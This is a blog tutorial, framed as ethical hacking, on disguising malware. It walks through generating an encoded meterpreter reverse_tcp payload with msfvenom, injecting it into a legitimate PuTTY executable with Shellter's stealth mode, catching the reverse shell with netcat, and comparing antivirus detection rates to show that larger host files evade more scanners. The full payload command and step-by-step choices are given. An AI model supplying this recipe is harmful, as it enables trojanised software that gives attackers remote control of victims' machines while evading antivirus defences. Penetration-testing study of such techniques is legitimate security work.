How to Inject Encoded Payload [Practical Examples]


Ethical hacking

Getting started to inject encoded payload with Shellter

One major problem that most Ethical hackers and penetration testers face is bypassing Anti-Virus software when executing payloads. If you are running an exploit or Shellcode that you wrote the code yourself, Anti-Virus software might not be a significant problem. However, if you are using pre-developed shellcodes/ payloads generated by tools like Metasploit, there is a high chance that it's signed as "malicious" by most AV software out there. Luckily, instead of spending hours researching and practicing how to evade AVs, you can use Shellter to inject your exploit into legit software like VNC, Putty, Winrar, and so much more.

 

What is Shellter?

Shellter is a dynamic shellcode injection tool used to inject exploits and Shellcode into native Windows applications. As of now, Shellter only supports injecting 32-bit applications. However, Shellter is available for both 32-bit and 64-bit applications, and it is available for different platforms, including Windows, Linux, and macOS. The Shellcode can be anything from user-coded exploits to those generated by tools like Metasploit. Shellter does not modify the host file/ PE to keep everything straightforward, including memory access or Read -  Write and Execute permissions.

How to Inject Encoded Payload [Practical Examples]

 

Shellter Features

  • Compatible with Windows systems (x86 and x64) and available for Windows and macOS using Wine/ Crossover
  • It's portable and doesn't require any complicated setups to run the tool
  • Supports all types of encoding used by Metasploit
  • It doesn't rely on system dependencies like Python,  C/ C++ modules, etc
  • Supports custom encoding generated by the user
  • Supports injecting multiple payloads/ exploits in the same PE
  • It comes embedded with several Metasploit payloads. Therefore, you can use Shellter to generate a payload and inject it into a PE, saving you much time.
  • It's free

You can read more about Shellter's features on their official website.

 

Download and Install Shellter

As we stated above, Shellter is available for Windows, Linux, and macOS. In this post, we will install Shellter on Kali Linux - The leading penetration testing and security auditing operating system in the market today. You can read more blogs on Kali Linux and Ethical Hacking on our Ethical hacking section.

To install Shellter on Kali Linux, execute the command below on your Terminal.

Note: If you are running a fresh installation of Kali Linux, you need to update the repositories. Check out our master guide on Kali Linux repositories.

sudo apt update
sudo apt install shellter

How to Inject Encoded Payload [Practical Examples]

After successfully installing Shellter on Kali Linux, we need to install Wine responsible for running Shellter on Linux systems. Execute the commands below on the Terminal.

sudo dpkg --add-architecture i386
sudo apt update
sudo apt -y install wine32

How to Inject Encoded Payload [Practical Examples]

 

Create a Payload With Metasploit

As we stated above, Shellter can be used with several payloads, including user-coded payload, Metasploit exploits, and much more. Additionally, it also comes embedded with several Metasploit exploits. However, as a test, we will generate a payload with Metasploit and use Shellter to inject in an executable Windows application like Putty.exe (32 bit). You can check out our Metasploit Tutorials for an in-depth guide on using Metasploit on Kali Linux.

Our target (victim) machine is Windows, and our attacking machine is the Kali Linux system. You need to get the IP addresses of both machines as we will require them when generating the payload. In our case, the IP addresses are assigned as follows:

  • Kali Linux: 192.168.1.46
  • Windows: 192.168.1.52

Launch the Terminal and use the syntax below to generate a Windows Reverse TCP payload with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali-IP] LPORT=[Listening-Port] -e x86/shikata_ga_nai -i 10 -f raw -o [path-to-where-you-save-the-payload]
e.g
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.46 LPORT=5657 -e x86/shikata_ga_nai -i 10 -f raw -o /home/golinux/Desktop/PhotoEditor.raw

Let's look at the code above in detail:

  • msfvenom: (a combination of Msfpayload and Msfencode) - It is a command-line utility of Metasploit used to generate shellcodes.
  • -p windows/meterpreter/reverse_tcp: Here, we specify the type of payload we want to create. In this case, we are creating a Windows Reverse TCP payload. It will give us a backdoor to the victims' machine.
  • LHOST=192.168.1.46: That is the local machine's IP (Kali Linux).
  • LPORT=5657: That is the port we will use to listen to any incoming connections from the victims' PC. We highly recommend using a number greater than 1000 but less than 65535.
  • -e x86/shikata_ga_nai -i 10: This is the encoder we will use to encode and obfuscate our payload. However, don't feel limited to Shikata as many other encoders are available in Msfvenom.
  • -f raw: That is the format we want to use for our payload. Even though you can specify an extension like "exe," the "raw" format or binary is much easier to inject in a Windows PE.
  • -o /home/golinux/Desktop/PhotoEditor.raw: That's sets the name of the payload and the path where we will store it.

How to Inject Encoded Payload [Practical Examples]

 

When we run the ls command on our Desktop directory, you can see that we successfully create our payload - PhotoEditor.raw.

How to Inject Encoded Payload [Practical Examples]

 

Inject Encoded Payload into Putty With Shellter

Launch Shellter by executing the command below on your Terminal to get started.

shelter

After a few seconds, another Terminal window will open, revealing the user-friendly prompts for using Shellter.

How to Inject Encoded Payload [Practical Examples]

 

Follow the steps below:

  1. The first prompt will ask you to choose the operation mode. You can choose between Automatic and Manual. For this post, we will use Automatic. Therefore, type "A" and hit Enter.
  2. Next, you will be prompted to set your PE target. The Windows executable you want to inject with the payload we generated with Msfvenom. In our case, we downloaded Putty.exe (32 bit) and placed it on our Desktop. We will provide the path to this file as shown below.How to Inject Encoded Payload [Practical Examples]
    This step might take up to two minutes, depending on your system specifications.
  3. Next, you will see a prompt "whether you want to enable Stealth mode." Select Yes by typing "Y" and pressing Enter.
  4. You will see a list of payloads that you can use to inject the PE. You will also see a prompt on whether you want to use any of the listed payloads or a custom payload. In our case, we have already created an exploit with Msfvenom. Therefore, select "C" for custom payload.
  5. Next, you will need to specify the path to your payload.
  6. You will see another prompt, "Is this payload a reflective DLL loader?" Select "NO" by typing "N," and press Enter to continue.How to Inject Encoded Payload [Practical Examples]

That's it! At this point, sit back and wait for Shellter to inject your exploit into the target PE.

 

Test the Injected Shellcode

To test the payload, we will carry out the steps below:

Start Netcat on our Kali Linux to listen to the port we specified on our payload. Which is port 5657.

How to Inject Encoded Payload [Practical Examples]

We will copy the file we injected with the payload to the Windows system to create a Reverse TCP connection to the Kali system.

So, we copied the Putty.exe file to our Windows system and executed it. As we expected, Putty successfully launched on our Windows system. See the image below.

How to Inject Encoded Payload [Practical Examples]

 

Also, something interesting happened. When we go back to our netcat window, we see a successful connection from our Windows system. Therefore, if we had used a tool like Meterpreter to start a "meterpreter" session, we could easily execute remote commands on our Windows system.

How to Inject Encoded Payload [Practical Examples]

 

Test the Injected Shellcode on Anti Virus Software

Now, we have one more challenge remaining - Bypassing AV software. For this post, we will use Viru total for demonstration. However, beware because this site shares samples with antivirus vendors. To get started, open the Virus Total website and upload the PE. In our case, it's the Putty.exe file. After running a scan on our file, we found that 29 out of 67 Anti virus software flagged our file as malicious. See the image below.

How to Inject Encoded Payload [Practical Examples]

 

But wait! There is something interesting to note. We repeated the whole process and used a different PE this time. We use Xpra.exe instead of Putty. The main difference between these two files is size. Putty is around 1.1 MB, while Xpra is around 102.8 MB. After injecting Xpra with our payload and testing it on Virus total, only Seven out 60 AV software detected it as a malicious file.

How to Inject Encoded Payload [Practical Examples]

 

Therefore, we can deduce that the more complex the target PE file, the harder it will be for Antiviruses to detect our injected Shell code.

 

Conclusion

In this post, we have given you a detailed guide on getting started with Shellter. However, there is still a lot that you can still do with Shellter there than what we have discussed. For that, please feel free to check out the official Shellter manual. For users who love interacting with GUI tools, you should get your hopes high since Shellter developers have announced releasing a GUI version of the tool. Please feel free to share with our readers in the comments any more tricks and tips you discovered while using Shellter.

 

Deepak Prasad

Deepak Prasad

He is the founder of GoLinuxCloud and brings over a decade of expertise in Linux, Python, Go, Laravel, DevOps, Kubernetes, Git, Shell scripting, OpenShift, AWS, Networking, and Security. With extensive experience, he excels in various domains, from development to DevOps, Networking, and Security, ensuring robust and efficient solutions for diverse projects. You can connect with him on his LinkedIn profile.

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can send mail to admin@golinuxcloud.com

Thank You for your support!!

Leave a Comment